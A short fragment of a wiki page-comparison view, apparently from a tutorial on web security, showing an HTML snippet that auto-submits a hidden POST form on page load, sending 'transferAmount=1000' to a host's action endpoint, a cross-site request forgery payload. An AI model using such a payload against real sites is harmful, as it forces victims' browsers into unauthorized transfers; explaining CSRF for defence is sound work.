Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Now construct a form:

Code Block
html
html
<body onload="document.getElementById('f').submit()">
    <form id="f" action="http://host.uci.edu/action" method="post">
        <input name="transferAmount" value="1000" />
    </form>
</body>

...